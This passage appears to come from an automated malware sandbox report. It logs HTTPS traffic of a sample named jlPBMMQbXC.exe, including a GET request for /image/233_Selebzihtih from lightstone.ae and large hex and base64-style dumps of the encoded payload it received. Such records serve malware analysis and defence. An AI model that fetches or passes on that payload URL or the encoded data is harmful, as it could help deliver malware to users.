                                                                      Data Ascii: 9NQAQmAMf+C4H0ELQfkzcSda8XRgBfOaVeNzyxhV9KvcFmTWr7Y8wwbanyIAtXm5TqnWvw7t03a/CGRd+UpdWO4NWb+lr/cA
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 72 74 71 47 62 75 4b 77 65 4b 54 71 52 7a 5a 6a 77 62 64 4c 74 69 71 58 39 73 4b 48 33 71 75 49 6b 47 52 43 4e 6f 4d 52 2b 4d 77 79 38 6c 4f 43 69 36 36 2f 6c 78 4f 4b 41 68 71 48 75 56 59 39 5a 4b 63 64 2b 67 50 4c 57 30 53 2b 64 35 6b 7a 49 64 4d 66 32 50 56 37 58 48 2f 66 4b 42 33 67 6e 38 71 44 39 49 61 56 43 43 66 53 36 66 7a 51 4b 35 54 5a 53 79 50 54 61 63 2f 6a 64 75 35 6d 78 2b 6d 4e 74 58 62 6c 44 66 50 73 32 6a 32 77 39 31 58 48 55 6f 71 6f 42 38 46 70 69 51 67 67 4f 43 35 44 38 75 59 30 68 6d 41 47 4e 61 61 4f 47 56 62 69 74 58 57 71 59 6d 53 51 6f 68 69 71 44 44 64 52 64 47 73 43 42 41 69 6a 75 49 4e 32 34 43 66 2f 65 36 36 77 64 6a 54 6d 36 62 61 66 50 57 41 7a 67 55 78 44 38 6c 72 69 33 72 61 51 49 48 5a 76 49 4c 68 32 5a 4a 6e 6e 6d 4c 35
                                                                      Data Ascii: rtqGbuKweKTqRzZjwbdLtiqX9sKH3quIkGRCNoMR+Mwy8lOCi66/lxOKAhqHuVY9ZKcd+gPLW0S+d5kzIdMf2PV7XH/fKB3gn8qD9IaVCCfS6fzQK5TZSyPTac/jdu5mx+mNtXblDfPs2j2w91XHUoqoB8FpiQggOC5D8uY0hmAGNaaOGVbitXWqYmSQohiqDDdRdGsCBAijuIN24Cf/e66wdjTm6bafPWAzgUxD8lri3raQIHZvILh2ZJnnmL5
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 54 72 43 67 38 4f 41 33 4d 32 76 46 76 4e 44 47 31 50 4b 32 56 78 7a 42 50 77 57 45 52 5a 67 31 55 6a 31 2f 46 43 65 4f 61 67 47 6d 34 46 44 61 2b 49 69 50 68 43 54 38 44 39 67 52 73 64 59 53 50 61 4a 48 4d 56 36 37 55 77 2b 55 6d 52 4d 7a 7a 34 69 7a 7a 65 6a 2f 38 4b 64 6b 6f 37 47 37 4e 53 57 7a 53 74 47 68 73 48 53 64 6a 57 54 41 57 78 34 2b 6a 36 6b 56 49 5a 63 52 77 58 66 75 52 68 38 42 45 6d 4e 59 56 4e 49 4d 35 45 4a 35 4a 55 70 56 72 65 66 41 56 70 4d 32 66 42 54 67 58 4a 6b 65 48 6f 53 57 33 41 65 4f 45 76 72 5a 37 35 4d 46 66 71 2f 4d 52 30 76 4d 4b 56 47 4f 43 65 4b 79 51 43 6a 68 7a 6e 41 57 6e 33 55 4f 50 48 51 61 72 72 41 31 48 53 31 37 38 68 6b 54 78 6e 52 59 76 38 48 61 61 38 2b 35 4a 47 72 74 6f 56 7a 74 47 4b 4c 38 71 71 35 46 72 69 33
                                                                      Data Ascii: TrCg8OA3M2vFvNDG1PK2VxzBPwWERZg1Uj1/FCeOagGm4FDa+IiPhCT8D9gRsdYSPaJHMV67Uw+UmRMzz4izzej/8Kdko7G7NSWzStGhsHSdjWTAWx4+j6kVIZcRwXfuRh8BEmNYVNIM5EJ5JUpVrefAVpM2fBTgXJkeHoSW3AeOEvrZ75MFfq/MR0vMKVGOCeKyQCjhznAWn3UOPHQarrA1HS178hkTxnRYv8Haa8+5JGrtoVztGKL8qq5Fri3
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 45 70 69 77 71 4c 34 6e 7a 35 6e 37 68 50 54 66 5a 4c 32 2f 49 6d 35 48 4d 57 2f 2f 4b 63 7a 65 67 42 54 63 47 63 79 66 6a 55 69 68 54 33 49 5a 77 33 59 4c 63 35 77 7a 74 50 59 64 65 38 31 70 62 70 6a 31 55 64 6b 68 6b 59 45 72 44 2f 4d 31 4b 36 52 4f 2f 32 7a 35 73 79 4e 70 4c 42 42 51 44 61 61 76 4e 34 77 30 44 77 67 6d 46 54 55 69 58 52 7a 4e 43 42 4c 71 73 4f 61 6d 77 4d 2b 48 55 71 66 30 62 4e 33 52 6a 62 79 6c 76 48 4c 66 56 6f 46 4d 74 6c 61 37 37 35 75 72 79 55 31 48 43 57 68 77 35 4e 51 43 52 38 76 69 51 6f 69 51 61 64 52 36 4c 4c 57 4f 53 4c 70 31 37 6a 6b 65 4a 67 34 4a 4b 76 65 56 68 55 42 46 31 2f 70 39 53 2b 64 52 33 64 61 49 4c 33 6a 6b 37 55 36 6a 49 6e 4a 31 65 64 72 69 45 4b 42 43 5a 62 44 6e 33 75 4a 4c 2f 32 73 62 39 75 75 5a 4d 45 7a
                                                                      Data Ascii: EpiwqL4nz5n7hPTfZL2/Im5HMW//KczegBTcGcyfjUihT3IZw3YLc5wztPYde81pbpj1UdkhkYErD/M1K6RO/2z5syNpLBBQDaavN4w0DwgmFTUiXRzNCBLqsOamwM+HUqf0bN3RjbylvHLfVoFMtla775uryU1HCWhw5NQCR8viQoiQadR6LLWOSLp17jkeJg4JKveVhUBF1/p9S+dR3daIL3jk7U6jInJ1edriEKBCZbDn3uJL/2sb9uuZMEz
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 55 4e 45 79 77 43 6e 73 54 79 73 41 4b 48 55 68 44 38 4a 51 75 61 4a 2f 33 6f 5a 64 6b 45 34 6a 50 66 38 30 34 31 65 6c 54 65 49 7a 71 70 79 43 35 46 42 53 65 4c 61 68 4d 6a 50 61 50 73 79 39 65 54 5a 78 4d 65 61 6d 6a 67 6d 74 62 70 6d 55 2f 43 65 53 69 42 41 66 31 7a 55 6d 55 6f 76 48 76 57 6a 31 6a 77 6a 4c 30 4b 5a 76 78 54 51 6f 53 68 79 4f 70 62 42 37 62 31 4b 63 4c 4a 34 76 4b 70 69 33 71 61 35 2b 79 5a 52 53 54 49 50 72 75 39 57 34 6d 34 61 59 43 56 4a 4f 4d 4d 67 71 51 6d 71 47 65 6f 56 55 4f 67 7a 75 31 4c 79 7a 6c 70 56 4a 68 7a 73 50 2f 42 6c 58 62 51 72 52 36 77 37 48 6c 4d 39 56 2b 75 33 52 47 63 6f 36 69 6f 6d 4b 53 52 45 69 4f 74 38 4b 47 30 50 36 2f 73 47 36 34 6f 63 38 77 38 72 73 68 63 4e 43 59 38 71 46 4c 44 75 77 53 66 46 52 71 6c 73
                                                                      Data Ascii: UNEywCnsTysAKHUhD8JQuaJ/3oZdkE4jPf8041elTeIzqpyC5FBSeLahMjPaPsy9eTZxMeamjgmtbpmU/CeSiBAf1zUmUovHvWj1jwjL0KZvxTQoShyOpbB7b1KcLJ4vKpi3qa5+yZRSTIPru9W4m4aYCVJOMMgqQmqGeoVUOgzu1LyzlpVJhzsP/BlXbQrR6w7HlM9V+u3RGco6iomKSREiOt8KG0P6/sG64oc8w8rshcNCY8qFLDuwSfFRqls
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 70 56 72 30 68 31 50 6f 44 47 59 48 61 66 54 46 6a 44 65 4f 45 68 63 6e 73 72 68 31 34 59 53 56 62 6a 34 33 62 67 43 7a 53 70 63 38 64 37 36 53 6e 61 37 50 6d 63 45 2b 6c 34 64 6e 31 44 38 51 76 35 69 78 4d 41 31 59 30 6e 6a 46 2b 2b 2f 32 36 47 4b 4d 6b 6d 56 70 57 77 4b 65 4c 51 36 73 45 65 47 32 67 46 7a 37 7a 67 54 39 78 76 53 69 62 35 71 4f 75 58 31 6f 39 41 4c 65 49 31 47 39 35 53 72 7a 46 4e 38 53 7a 73 6f 4a 59 4a 77 4b 48 56 77 51 47 54 74 38 6c 2b 34 7a 39 6f 71 46 30 43 65 2b 30 4d 31 44 43 72 57 51 50 30 6f 4e 36 2b 67 4e 53 44 67 6e 72 78 2b 47 45 51 79 65 47 39 6f 78 61 76 4f 47 54 42 4c 61 5a 31 76 4a 4a 79 70 4e 49 38 61 50 4e 44 75 42 72 73 75 69 44 33 48 32 68 77 69 6b 55 4f 57 4d 42 2f 51 41 49 79 47 53 6d 39 32 4d 39 4b 77 4b 6e 6b 39
                                                                      Data Ascii: pVr0h1PoDGYHafTFjDeOEhcnsrh14YSVbj43bgCzSpc8d76Sna7PmcE+l4dn1D8Qv5ixMA1Y0njF++/26GKMkmVpWwKeLQ6sEeG2gFz7zgT9xvSib5qOuX1o9ALeI1G95SrzFN8SzsoJYJwKHVwQGTt8l+4z9oqF0Ce+0M1DCrWQP0oN6+gNSDgnrx+GEQyeG9oxavOGTBLaZ1vJJypNI8aPNDuBrsuiD3H2hwikUOWMB/QAIyGSm92M9KwKnk9
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 75 37 5a 35 59 67 30 77 68 2f 64 41 69 6e 66 55 61 32 49 48 71 4a 6f 6d 43 52 5a 77 49 63 57 74 51 6e 75 4a 48 63 30 37 52 52 71 2b 4d 6f 37 55 33 4d 70 38 30 36 48 73 74 51 73 32 70 79 59 38 57 4a 55 52 58 71 78 6d 4f 56 78 45 55 35 62 50 36 69 4d 36 71 37 59 46 55 59 77 63 32 66 6e 45 67 69 42 63 4d 43 39 76 4a 4c 5a 4f 62 41 74 6a 42 43 4e 36 30 75 6e 39 2b 73 55 54 4f 6f 69 56 57 46 63 33 37 51 52 34 75 5a 34 4b 6a 6b 6c 64 4c 64 58 38 57 70 6f 64 43 41 68 38 38 73 57 30 43 32 65 45 4d 36 42 42 68 55 4c 6f 30 30 6e 79 6e 45 46 4a 52 50 4b 4c 76 70 32 4e 37 63 6b 6e 6a 6c 49 49 6f 4d 64 56 75 6b 55 2b 47 59 57 5a 61 30 52 36 2b 73 41 68 77 2b 4f 30 58 62 66 4b 39 4a 57 37 6b 32 48 39 79 62 46 36 69 76 6b 55 4f 6f 6f 49 68 44 65 67 79 56 79 73 30 73 68
                                                                      Data Ascii: u7Z5Yg0wh/dAinfUa2IHqJomCRZwIcWtQnuJHc07RRq+Mo7U3Mp806HstQs2pyY8WJURXqxmOVxEU5bP6iM6q7YFUYwc2fnEgiBcMC9vJLZObAtjBCN60un9+sUTOoiVWFc37QR4uZ4KjkldLdX8WpodCAh88sW0C2eEM6BBhULo00nynEFJRPKLvp2N7cknjlIIoMdVukU+GYWZa0R6+sAhw+O0XbfK9JW7k2H9ybF6ivkUOooIhDegyVys0sh
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 53 6a 31 42 4b 6c 72 77 56 52 53 39 73 52 51 32 66 70 4b 35 71 59 6c 33 58 69 76 38 4b 46 70 42 50 45 70 55 71 34 6e 74 76 35 72 53 6e 31 76 73 50 56 41 54 70 57 6a 6e 43 47 4c 4c 2f 50 33 76 47 47 54 41 36 47 73 63 57 77 33 32 7a 4f 56 63 6a 68 77 32 39 34 73 38 2f 72 47 48 78 76 4b 57 73 7a 51 2f 55 75 46 34 46 62 78 6c 56 74 6f 76 68 6b 4a 63 52 38 75 66 56 4b 55 7a 4a 68 50 70 5a 36 38 45 42 37 2b 55 56 61 2f 68 7a 34 6b 33 6b 6f 58 47 70 7a 6e 43 77 6a 4b 72 75 73 70 2b 64 49 57 55 6c 69 2f 64 6b 4e 77 73 48 30 6c 5a 46 76 56 41 32 4d 54 47 62 42 6f 4c 61 6c 57 36 78 65 6c 53 32 59 44 57 38 6d 79 66 75 70 4e 4d 57 63 72 33 41 50 32 49 50 54 47 67 6e 56 78 63 59 65 76 4b 76 75 34 66 52 33 32 57 72 4d 75 2f 79 54 74 79 6f 58 54 6e 74 42 67 53 2b 42 57
                                                                      Data Ascii: Sj1BKlrwVRS9sRQ2fpK5qYl3Xiv8KFpBPEpUq4ntv5rSn1vsPVATpWjnCGLL/P3vGGTA6GscWw32zOVcjhw294s8/rGHxvKWszQ/UuF4FbxlVtovhkJcR8ufVKUzJhPpZ68EB7+UVa/hz4k3koXGpznCwjKrusp+dIWUli/dkNwsH0lZFvVA2MTGbBoLalW6xelS2YDW8myfupNMWcr3AP2IPTGgnVxcYevKvu4fR32WrMu/yTtyoXTntBgS+BW


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.949746162.19.139.1024437280C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-26 07:12:22 UTC168OUTGET /image/233_Selebzihtih HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: lightstone.ae
                                                                      2024-11-26 07:12:22 UTC210INHTTP/1.1 200 OK
                                                                      Date: Tue, 26 Nov 2024 07:12:22 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Last-Modified: Mon, 16 Sep 2024 04:46:00 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1072224
                                                                      2024-11-26 07:12:22 UTC7982INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 53 49 41 34 6c 45 68 77 6e 47 68 55 68 4a 78 6f 66 48 69 55 64 47 41 38 57 48 42 30 54 45 42 4d 53 47 53 59 6a 4a 42 6b 55 46 67 38 56 44 79 49 5a 4a 78 38 58 46 68 73 4f 47 52 51 65 48 68 6f 61 44 79 63 56 46 52 59 64 47 69 41 4f 45 42 45 57 49 42 4d 53 4a 52 41 6d 44 68 34 55 45 78 6b 6c 45 52 51 58 45 68 49 51 49 51 34 63 4a 77 34 6e 48 42 77 58 70 71 36 6c 57 53 4f 6e 73 55 73 41 45 68 6b 53 44 79 63 57 46 53 45 57 46 61 61 75 70 56 6b 6a 70 37 46 4c 76 64 50 42 32 4c 33 48 32 73 58 49 7a 4e 72 46 30 74 48 59 30 4d 76 43 79 63 66 51 76 73 4f 2b 76 63 54 5a 7a 73 2f 45 76 38 6e 43 79 4d 4c 4e 78 4e 72 53 79 73 6e 47 77 63 53 2f 30 64 48 46 78 63 4c 61 79 4d 6a 4a 30 4d 58 54 77 63 4f 38 79 64 4f 2b 76 64 6a 44 32 63 48
                                                                      Data Ascii: pq6lWSOnsUsSIA4lEhwnGhUhJxofHiUdGA8WHB0TEBMSGSYjJBkUFg8VDyIZJx8XFhsOGRQeHhoaDycVFRYdGiAOEBEWIBMSJRAmDh4UExklERQXEhIQIQ4cJw4nHBwXpq6lWSOnsUsAEhkSDycWFSEWFaaupVkjp7FLvdPB2L3H2sXIzNrF0tHY0MvCycfQvsO+vcTZzs/Ev8nCyMLNxNrSysnGwcS/0dHFxcLayMjJ0MXTwcO8ydO+vdjD2cH
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 53 46 6b 4a 35 49 34 46 74 73 61 59 54 33 46 72 7a 67 4e 35 73 34 73 42 37 2b 37 36 67 39 46 56 2b 7a 44 6e 48 30 73 78 52 6b 31 52 77 34 44 54 30 65 35 7a 62 2f 31 4a 52 47 76 6a 47 39 76 32 6a 68 72 50 32 4a 58 31 78 4c 73 33 63 72 4f 70 35 72 38 4e 65 74 4b 6c 43 34 4d 69 42 58 73 46 54 70 6f 4a 53 34 4a 51 65 76 71 4f 72 62 42 50 48 6f 6b 6c 58 44 46 52 4c 58 50 39 52 58 63 55 78 46 54 48 37 2f 63 57 6e 35 6a 55 4b 39 6f 45 48 5a 78 31 44 4d 61 58 76 38 44 6e 45 68 48 75 53 32 41 63 54 68 75 70 66 72 6c 38 69 64 54 51 4c 33 66 56 63 6c 45 34 4e 71 37 37 4f 70 74 36 56 4a 6b 2b 68 61 57 70 71 2f 6d 42 4d 53 66 74 67 44 44 78 6a 66 2f 63 32 66 45 43 62 70 71 76 34 65 66 35 63 78 5a 56 66 31 6e 57 2f 47 57 65 65 74 50 53 7a 72 72 41 5a 48 55 4b 4c 57 7a
                                                                      Data Ascii: SFkJ5I4FtsaYT3FrzgN5s4sB7+76g9FV+zDnH0sxRk1Rw4DT0e5zb/1JRGvjG9v2jhrP2JX1xLs3crOp5r8NetKlC4MiBXsFTpoJS4JQevqOrbBPHoklXDFRLXP9RXcUxFTH7/cWn5jUK9oEHZx1DMaXv8DnEhHuS2AcThupfrl8idTQL3fVclE4Nq77Opt6VJk+haWpq/mBMSftgDDxjf/c2fECbpqv4ef5cxZVf1nW/GWeetPSzrrAZHUKLWz
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 7a 6f 43 31 44 48 41 42 67 55 34 6b 33 51 78 48 6c 67 46 70 76 42 64 74 6e 38 72 6e 6a 39 71 65 30 6b 4a 49 77 4b 47 4a 56 7a 67 42 38 49 44 32 38 61 43 33 6c 77 4b 64 65 6a 76 57 79 55 7a 64 45 75 48 73 66 4b 5a 78 44 31 57 6a 5a 78 2b 7a 74 63 76 33 69 4e 4e 7a 4a 65 78 58 70 47 44 6f 39 33 50 48 69 65 5a 78 58 31 55 47 70 76 4f 4a 78 74 37 4d 48 79 32 44 44 6d 77 72 56 4a 4a 6d 77 79 53 78 6a 30 38 59 4a 61 4c 4a 74 62 30 2b 54 71 53 78 77 35 6f 4e 30 6b 34 51 36 47 70 6e 43 62 45 77 6a 56 6c 78 66 79 70 59 52 72 36 4a 4f 54 38 61 61 45 32 65 49 42 5a 45 5a 36 78 55 39 70 58 74 7a 79 6e 41 51 68 54 7a 39 57 48 58 39 42 51 77 44 2f 73 55 48 41 47 66 34 4c 31 35 33 4d 6c 64 6e 43 31 4f 31 6f 34 63 6c 57 34 33 37 41 62 32 48 6f 36 2f 38 46 57 6f 48 58 55
                                                                      Data Ascii: zoC1DHABgU4k3QxHlgFpvBdtn8rnj9qe0kJIwKGJVzgB8ID28aC3lwKdejvWyUzdEuHsfKZxD1WjZx+ztcv3iNNzJexXpGDo93PHieZxX1UGpvOJxt7MHy2DDmwrVJJmwySxj08YJaLJtb0+TqSxw5oN0k4Q6GpnCbEwjVlxfypYRr6JOT8aaE2eIBZEZ6xU9pXtzynAQhTz9WHX9BQwD/sUHAGf4L153MldnC1O1o4clW437Ab2Ho6/8FWoHXU
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 36 36 7a 46 30 6d 73 2f 4a 57 32 47 63 50 6c 71 4a 35 35 6e 4d 44 78 33 41 44 43 46 62 4f 49 52 44 39 79 4a 76 66 30 70 6a 53 4a 49 51 30 6d 37 67 39 38 67 53 4c 6d 63 48 2b 30 6d 68 5a 76 33 77 52 77 38 79 49 68 66 78 79 45 32 61 69 4a 38 45 4a 66 42 73 73 48 78 79 30 6c 62 4a 53 4b 77 54 37 2b 74 57 61 49 43 5a 65 68 44 57 5a 63 47 52 73 30 31 4c 57 7a 4c 41 39 50 72 4b 4f 72 61 4f 54 69 67 42 57 53 70 34 58 6b 55 73 49 77 43 32 64 45 32 51 6a 46 71 58 6d 57 4d 30 67 50 6d 4c 62 6b 4a 5a 34 4b 4b 42 76 43 2b 77 62 65 34 67 4b 42 78 53 56 7a 73 62 59 30 51 54 48 79 49 79 6f 2b 67 57 35 53 51 64 51 52 74 51 57 6f 31 6b 57 57 61 71 69 38 4c 45 72 4e 75 44 4e 5a 36 4d 34 4a 59 79 38 44 4c 4d 6f 38 63 73 31 4d 31 78 66 4a 59 76 49 42 6d 42 79 41 42 6f 6b 50
                                                                      Data Ascii: 66zF0ms/JW2GcPlqJ55nMDx3ADCFbOIRD9yJvf0pjSJIQ0m7g98gSLmcH+0mhZv3wRw8yIhfxyE2aiJ8EJfBssHxy0lbJSKwT7+tWaICZehDWZcGRs01LWzLA9PrKOraOTigBWSp4XkUsIwC2dE2QjFqXmWM0gPmLbkJZ4KKBvC+wbe4gKBxSVzsbY0QTHyIyo+gW5SQdQRtQWo1kWWaqi8LErNuDNZ6M4JYy8DLMo8cs1M1xfJYvIBmByABokP
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 51 78 58 55 66 41 63 6a 50 75 51 54 71 39 39 36 48 45 51 78 42 55 4c 47 41 59 2f 38 77 6a 50 33 38 7a 54 78 62 34 32 72 68 48 73 54 68 2b 69 32 64 6f 49 66 71 53 51 35 52 64 72 38 30 62 77 4a 30 39 67 73 2b 4f 78 4b 4c 73 31 55 66 70 48 53 33 58 45 56 4e 6f 4f 48 59 39 2b 63 42 34 72 76 67 31 57 75 46 4f 58 73 69 69 48 69 46 46 4a 4c 6e 74 79 53 32 34 49 2f 6b 51 2b 51 33 59 4b 73 76 66 44 61 6d 4f 47 41 6e 2f 69 79 43 78 76 2b 48 6e 41 4d 62 53 4e 62 2f 55 73 31 78 6c 36 4b 63 73 4b 6f 44 71 31 6b 34 71 30 54 32 66 4c 46 72 55 41 78 79 6d 52 73 46 53 58 73 6c 71 48 44 67 36 50 44 55 74 30 73 61 49 75 54 54 74 38 4f 74 34 7a 57 71 65 4d 4e 61 2f 43 46 7a 75 30 2b 30 77 64 4f 67 48 63 43 67 64 6f 43 78 33 54 53 72 4c 6f 43 36 76 50 6c 57 69 2f 73 6b 67 4c
                                                                      Data Ascii: QxXUfAcjPuQTq996HEQxBULGAY/8wjP38zTxb42rhHsTh+i2doIfqSQ5Rdr80bwJ09gs+OxKLs1UfpHS3XEVNoOHY9+cB4rvg1WuFOXsiiHiFFJLntyS24I/kQ+Q3YKsvfDamOGAn/iyCxv+HnAMbSNb/Us1xl6KcsKoDq1k4q0T2fLFrUAxymRsFSXslqHDg6PDUt0saIuTTt8Ot4zWqeMNa/CFzu0+0wdOgHcCgdoCx3TSrLoC6vPlWi/skgL
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 49 33 74 63 49 63 5a 73 48 34 4d 75 69 78 4b 78 59 70 57 50 52 58 35 4c 47 53 30 43 65 53 30 59 4d 5a 33 6d 55 54 36 4a 65 77 50 68 43 31 6d 63 58 78 55 45 6c 68 52 4d 65 47 59 56 78 68 65 72 67 31 51 54 53 2b 77 57 6e 37 54 43 77 69 4a 74 7a 56 53 4b 32 56 4c 38 68 78 61 73 66 6d 73 36 45 74 79 39 58 31 76 6b 57 37 53 6a 5a 63 70 41 72 49 46 4d 73 38 4d 30 31 34 65 73 36 36 79 45 31 48 69 73 66 65 31 78 53 64 6d 43 79 50 52 2b 4c 54 36 59 54 42 52 36 68 4e 63 32 6e 67 4f 6d 4a 42 54 65 4c 4b 63 4a 77 69 6a 44 69 74 57 59 33 51 61 54 2b 45 34 72 47 63 41 51 30 73 7a 71 66 69 53 75 6d 67 4a 4e 42 73 38 69 58 6c 65 32 6f 61 63 78 39 51 48 78 77 61 67 77 34 45 48 34 73 31 61 71 46 6c 79 57 77 46 72 55 41 71 71 48 4c 4d 50 32 65 4e 53 53 4f 77 74 39 43 50 76
                                                                      Data Ascii: I3tcIcZsH4MuixKxYpWPRX5LGS0CeS0YMZ3mUT6JewPhC1mcXxUElhRMeGYVxherg1QTS+wWn7TCwiJtzVSK2VL8hxasfms6Ety9X1vkW7SjZcpArIFMs8M014es66yE1Hisfe1xSdmCyPR+LT6YTBR6hNc2ngOmJBTeLKcJwijDitWY3QaT+E4rGcAQ0szqfiSumgJNBs8iXle2oacx9QHxwagw4EH4s1aqFlyWwFrUAqqHLMP2eNSSOwt9CPv
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 49 67 6f 45 71 70 4a 53 72 31 68 2f 44 43 32 74 63 67 37 63 62 4d 46 70 45 35 57 50 4b 45 79 49 77 55 6b 34 6b 72 49 72 56 52 4d 53 69 73 4e 42 66 36 65 2f 44 74 4a 44 59 37 43 43 65 2f 34 51 58 70 64 65 4d 6e 47 63 61 32 65 4f 52 32 42 35 6f 59 79 64 4a 7a 33 41 35 63 56 52 78 31 57 76 67 6c 67 46 75 65 35 48 30 4c 69 79 49 58 50 68 55 6c 6b 50 34 54 49 75 4a 34 2b 43 44 6d 6d 2f 4d 58 67 54 77 63 49 76 6c 46 67 77 38 67 33 79 67 57 44 76 70 64 44 55 69 74 72 74 2f 59 33 58 51 70 69 65 33 45 2b 50 4a 35 6e 79 67 56 79 4a 41 68 2b 7a 68 6e 36 64 79 41 56 51 33 45 34 49 48 6b 5a 34 63 41 38 36 34 74 4e 69 56 31 33 69 44 74 71 6b 46 54 4b 34 6e 72 48 69 6e 74 6d 6e 77 6b 42 5a 77 54 34 44 34 47 52 69 45 42 78 64 51 68 57 5a 57 39 44 39 56 50 6b 53 4d 66 52
                                                                      Data Ascii: IgoEqpJSr1h/DC2tcg7cbMFpE5WPKEyIwUk4krIrVRMSisNBf6e/DtJDY7CCe/4QXpdeMnGca2eOR2B5oYydJz3A5cVRx1WvglgFue5H0LiyIXPhUlkP4TIuJ4+CDmm/MXgTwcIvlFgw8g3ygWDvpdDUitrt/Y3XQpie3E+PJ5nygVyJAh+zhn6dyAVQ3E4IHkZ4cA864tNiV13iDtqkFTK4nrHintmnwkBZwT4D4GRiEBxdQhWZW9D9VPkSMfR
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 45 50 4e 37 53 74 47 43 37 59 37 31 51 31 4b 30 58 34 51 75 78 4a 57 78 37 39 2f 32 50 63 56 66 6a 76 6e 4a 41 51 77 4d 6e 55 6f 2f 32 38 74 67 62 62 6a 6e 35 74 4f 54 31 43 78 68 62 63 65 6e 55 54 76 58 30 55 34 35 46 77 6e 79 62 32 6c 73 39 6d 6a 35 66 76 48 53 2f 73 42 6e 39 42 48 78 6e 57 7a 47 45 72 37 34 41 6c 66 63 44 58 6d 77 4d 42 7a 6e 41 62 58 53 6c 4c 36 6d 45 35 59 76 51 53 53 62 53 49 6b 74 4b 4c 37 4e 6d 4e 78 46 76 57 4f 6f 52 56 7a 75 42 51 58 4a 75 69 54 73 30 62 38 50 73 31 79 42 6c 77 63 7a 46 51 52 49 73 58 6b 54 59 30 42 46 55 71 4f 4d 4e 36 45 4e 5a 41 4d 49 41 54 4b 32 76 6a 4d 73 49 46 78 2b 62 45 54 4e 68 75 4f 54 59 55 69 4a 6e 4d 4a 6c 41 71 56 6c 7a 4e 49 49 67 43 72 5a 59 33 4f 2f 78 43 4f 6e 57 61 48 78 4e 51 72 63 31 67 50
                                                                      Data Ascii: EPN7StGC7Y71Q1K0X4QuxJWx79/2PcVfjvnJAQwMnUo/28tgbbjn5tOT1CxhbcenUTvX0U45Fwnyb2ls9mj5fvHS/sBn9BHxnWzGEr74AlfcDXmwMBznAbXSlL6mE5YvQSSbSIktKL7NmNxFvWOoRVzuBQXJuiTs0b8Ps1yBlwczFQRIsXkTY0BFUqOMN6ENZAMIATK2vjMsIFx+bETNhuOTYUiJnMJlAqVlzNIIgCrZY3O/xCOnWaHxNQrc1gP
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 49 6c 55 53 6a 34 44 39 31 6e 39 64 31 6d 59 49 38 6c 58 62 45 65 49 77 73 49 75 65 33 35 71 6d 6a 71 42 59 61 36 38 41 35 46 75 79 53 41 2f 66 45 58 4c 77 36 37 4b 6a 4f 54 4d 43 4a 51 4f 37 76 72 33 6f 33 74 4b 49 36 6f 34 69 6b 64 33 71 72 72 56 74 71 6f 44 2b 69 6c 78 4f 70 54 54 52 6b 53 44 71 6c 4e 44 56 59 6f 42 68 53 77 72 4a 34 68 5a 6e 31 6b 4a 39 74 55 50 67 2f 69 49 4a 66 63 50 35 42 49 4a 44 42 6d 68 79 49 6d 77 33 62 7a 61 79 31 68 49 47 6b 4e 68 2b 38 38 45 77 63 6b 44 42 68 57 47 71 73 50 64 42 32 52 7a 33 55 6b 34 4a 52 54 36 5a 6e 4b 59 79 6a 36 71 5a 77 69 69 73 37 45 48 30 72 7a 34 68 69 4c 38 6f 45 6f 71 70 2b 49 44 6e 4e 76 55 50 4a 56 32 44 59 56 67 34 67 31 4a 48 35 41 50 64 37 57 30 4f 59 54 32 71 45 44 33 52 4c 50 53 53 61 68 4b
                                                                      Data Ascii: IlUSj4D91n9d1mYI8lXbEeIwsIue35qmjqBYa68A5FuySA/fEXLw67KjOTMCJQO7vr3o3tKI6o4ikd3qrrVtqoD+ilxOpTTRkSDqlNDVYoBhSwrJ4hZn1kJ9tUPg/iIJfcP5BIJDBmhyImw3bzay1hIGkNh+88EwckDBhWGqsPdB2Rz3Uk4JRT6ZnKYyj6qZwiis7EH0rz4hiL8oEoqp+IDnNvUPJV2DYVg4g1JH5APd7W0OYT2qED3RLPSSahK
                                                                      2024-11-26 07:12:22 UTC8000INData Raw: 59 65 51 30 69 31 37 64 51 78 61 43 66 58 76 49 34 50 7a 71 6b 2f 4b 39 4c 76 78 68 75 6f 59 47 63 6c 57 46 6f 4c 4b 75 6f 69 55 68 31 33 47 54 67 72 44 78 53 64 49 6e 61 44 5a 52 2f 67 44 6a 49 51 32 43 64 4c 49 62 2f 48 54 67 2b 4b 6f 6d 6f 63 71 5a 41 47 45 6d 77 6b 41 79 63 63 77 4d 51 71 63 49 61 43 65 79 4d 32 70 39 36 2b 66 38 41 6e 4b 63 45 52 4a 59 61 4a 75 68 68 69 6e 39 48 71 30 43 42 6a 37 35 69 4b 5a 74 37 37 39 2b 41 59 55 70 79 45 4a 57 4b 35 6e 53 72 55 51 46 63 6c 36 71 53 48 4a 49 6e 62 4a 75 72 54 74 68 6e 72 79 71 7a 38 38 71 5a 4e 52 53 67 47 33 33 44 37 74 6e 38 4b 38 39 50 4c 36 66 73 2f 48 39 7a 64 78 70 76 66 4f 75 4c 4d 37 50 73 34 38 57 49 70 30 4d 65 6c 33 53 69 4e 77 43 5a 76 68 78 62 77 73 79 55 79 48 6a 5a 49 33 66 43 6c 5a
